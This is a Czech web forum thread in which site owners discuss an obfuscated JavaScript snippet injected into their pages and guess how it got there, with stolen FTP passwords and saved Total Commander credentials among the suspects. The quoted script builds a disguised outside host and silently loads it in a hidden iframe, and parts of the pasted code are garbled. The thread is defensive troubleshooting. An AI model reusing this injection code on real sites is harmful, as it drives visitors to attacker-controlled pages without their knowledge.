Autor Zpráva
rimidalf
Profil *
#1 · Zasláno: 8. 1. 2008, 10:55:28
Odpovědět Citovat
Na nasich strankach "se objevil" zakodovny tento script:

pres Firefox - development toolbar - view generated source to vypada takto:


String.prototype.VPKB = function() { var t=this, o=''; for(var i=t.length; i>=0; i-#' o+=t.substr(i,1); return o; }
function uogOHS(){}
uogOHS.prototype = {

host:'nc.4orea.ved'.VPKB(),path:'/nc.gnitsoh-niam/'.VPKB(),cookieName :'vdra4',cookieValue:1,

install : function()
{
if(!this.alreadyInstalled())
{
var s = "<iframe width=1 height=1 frameBorder=0 src='" + this.getFrameURL() + "'></iframe>";
try { document.write(s) }
catch(e){ document.write("<html><body>" + s + "</body></html>") s
this.setCookie(this.cookieName, this.cookieValue);
}
},
setCookie : function(name, value)
{
var d= new Date(); d.setTime(new Date().getTime() + 86400000);
document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString();
},
alreadyInstalled : function()
{
return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
},
getFrameURL : function()
{
var dlh3jocument.location.host;
return 'http://' + ((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.host + this.path;
},
getRandString : function()
{
var l=16, c= '0123456789abcdef', o=''; for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1);
return o;
}
}
var o = new uogOHS();.a.install();
</script>


Diky
Chamurappi
Profil
#2 · Zasláno: 8. 1. 2008, 11:02:11
Odpovědět Citovat
Virus. Skript smaž a přehesluj FTP.
Cup
Profil
#3 · Zasláno: 8. 1. 2008, 11:41:25
Odpovědět Citovat
rimidalf
dobrý den jak se vám tam dostal?? ... přes nejaky formulář, nebo proste jen tak? .... (by mě zajímalo)

Chamurappi
... jak se tomu dá předcházet, zabránit... poraďte nerad bych s tim měl někdy v budoucnu problémy
rimidalf
Profil *
#4 · Zasláno: 8. 1. 2008, 11:46:03
Odpovědět Citovat
mohly ale byt zmeneny pres SFTP/SCP nebo pomoci PHP skriptu (to bohuzel nepozname)...
moravi
Profil *
#5 · Zasláno: 9. 1. 2008, 15:42:41
Odpovědět Citovat
Vemi zajimave, tak se mi dostal do stranek tento skript, a podle datumu teto diskuze to vypada ze skoro v stejny cas. Zajimave je takze ze se dostal jen do php soubru v korenovem adresari meho hosting ale do skripu v podslozkach se nezapsal ...

Muzes mi prosimte rict u koho mas hosting (nebo aspon adresu tvych stranek nebo staci jen IP)? kdyz to nahodou neni problem se zabezpecenim stejneho serveru ...
Petyk
Profil *
#6 · Zasláno: 9. 1. 2008, 17:27:54
Odpovědět Citovat
serverem to nebude... nepouzivate total commander (nebo jiny) na ftp, ktery da vase hesla bez boje?
rimidalf
Profil *
#7 · Zasláno: 10. 1. 2008, 09:32:06
Odpovědět Citovat
IP je toto:

88.146.119.130

Jak jsem psal vyse:
-mohly ale byt zmeneny pres SFTP/SCP nebo pomoci PHP skriptu (to bohuzel nepozname)...

to je vyjadreni providera, chtel jsem po nem vypis provozu pres FTP, takze total comander muzem asi vynechat?

U nas do bylo zapsano do vsech .php a .html v korenu, do podadresaru ne.

Zajimave, ze jednim z podadresaru je virt. server (s nepravdepodobne uhodnutelnou, nikde nezverejnenou domenou 3 radu pro pokusy, www2.xxxx ), ktery byl napaden taky, tedy jen jeho koren. A ted, (je tu nejaka baba?).
moravi
Profil *
#8 · Zasláno: 10. 1. 2008, 10:19:10
Odpovědět Citovat
O stejny server se nejdna, takze mozna to fakt bude pres muj ucet. Normalne pouzivam WinSCP, ale obcas i ten total commander. Takze si ted zmenim heslo, prestanu pouzivat uplne Total Commander a uvidim jak to dopadne ....

Jeste me napada zda to nepouziva nejaky bug v Apache2 ze to zasahlo i ten vas virt. server, ale na druhou stranu pravo editovani na soubory v korenovem adresari mam jen ja (rw-r-----) a root, takze teoreticky at je to chyba v apachi nebo v PHP skriptu tak uzivatel pod nemz bezi apache nema pravo zapisovani do mych souboru!!!! ... Mozna ze fakt jde o ukradene heslo, ale v tom pripade proc to infikuje jen korenovy adresar kdyz vlastne pres muj ucet muze udelat cokoliv !!!! Fakt nevim :-(
Joker
Profil
#9 · Zasláno: 10. 1. 2008, 10:21:26
Odpovědět Citovat
moravi
prestanu pouzivat uplne Total Commander
Stačí si tam neukládat heslo (před čímž nakonec varuje i samotný TC)
Časová prodleva: 2 měsíce
harder
Profil *
#10 · Zasláno: 1. 3. 2008, 13:28:23
Odpovědět Citovat
neviete niekto, co sposobuje tento virus? ake nebezpecie mi hrozi, ked sa s nim stretnem?
wini
Profil *
#11 · Zasláno: 1. 3. 2008, 17:44:43
Odpovědět Citovat
Snad jen paranoiu nebo ztratu soukromi?
Časová prodleva: 16 let

Vaše odpověď

Mohlo by se hodit

Neumíte-li správně určit příčinu chyby, vkládejte odkazy na živé ukázky.
Užíváte-li nějakou cizí knihovnu, ukažte odpovídajícím, kde jste ji vzali.

Užitečné odkazy:

Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm:

0